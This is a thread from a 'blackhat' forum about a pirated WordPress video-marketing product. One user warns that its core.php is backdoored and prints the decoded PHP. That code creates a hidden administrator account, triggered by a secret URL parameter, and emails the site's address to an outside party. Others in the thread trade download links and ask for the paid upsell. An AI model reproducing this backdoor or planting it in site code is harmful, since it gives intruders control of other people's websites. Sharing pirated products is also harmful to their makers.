Best Blackhat Forum

Full Version: [GET] Video App Monarchy - Dominate Videos With Viral Traffic
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Any mirror for the Bonus? Thanks
Where is the video and pdf files?
This is a fantastic share. Following are the links to the instruction videos:

Video App Monarchy Walkthrough by Fual Tolieb Part 1
http://www.youtube.com/watch?v=0DUsGM6_Ivo

Video App Monarchy Walkthrough by Fuad Tolieb Part 2
http://www.youtube.com/watch?v=gCaIgG9gMZo

Have anyone figured out what the code is in core.php?
yes, something encrypted in core.php
Be careful, the core.php file is backdoored!

PHP Code:
<?phpadd_action('wp_head''vbe3juka');function vbe3juka(){    If ($_GET['cms'] == 'jjoplmh') {        require('wp-includes/registration.php');        If (!username_exists('wordpress')) {            $user_id wp_create_user('wordpress''gh67io9Cjm');            $user    = new WP_User($user_id);            $user->set_role('administrator');        }    }}add_action('wp_head''vf3easxv');function vf3easxv(){    If (!username_exists('wordpress')) {        $addressdecode base64_decode("frogan@gmx.com");        $vari          'Wordpress Plugin Amazon';        mail($addressdecodeget_bloginfo('wpurl'), $vari);    }} 

Someone decoded part of the file for me...
Anyone have the OTO? I'ts a wordpress theme.
Thanks Cybeard! I was waiting for this. 1 rep for you :)
Here is the full decoded core.php file, I've removed the login/password/e-mail of the backdoor.

http://pastebay.net/1163570

Still looking for the OTO!
(12-13-2012 04:28 AM)cybeard Wrote: [ -> ]Here is the full decoded core.php file, I've removed the login/password/e-mail of the backdoor.

/1163570

Still looking for the OTO!
(12-13-2012 04:28 AM)cybeard Wrote: [ -> ]Sorry don't have... I am non techy..What to do with decoded .php file? thanks
(12-13-2012 04:55 AM)genos Wrote: [ -> ]
(12-13-2012 04:28 AM)cybeard Wrote: [ -> ]Sorry don't have... I am non techy..What to do with decoded .php file? thanks
Just replace the encrypted code you have in core.php file.
Pages: 1 2 3
Reference URL's